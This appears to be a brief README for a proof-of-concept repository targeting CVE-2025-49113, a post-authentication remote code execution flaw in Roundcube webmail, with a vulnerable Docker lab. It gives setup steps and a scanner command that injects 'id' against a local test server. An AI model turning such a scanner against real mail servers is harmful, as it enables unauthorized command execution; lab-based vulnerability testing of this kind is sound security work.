
인증 후 원격 코드 실행 PoC for CVE-2025-49113 in Roundcube webmail. 취약한 Docker 환경 및 명령어 인젝션 테스트용 Python 스캐너 포함.
cd Stand
docker-compose up -d
cd PoC/src
python3 scanner.py --target http://localhost:9000 --username test --password test --command "id"
test / testhttp://localhost:9000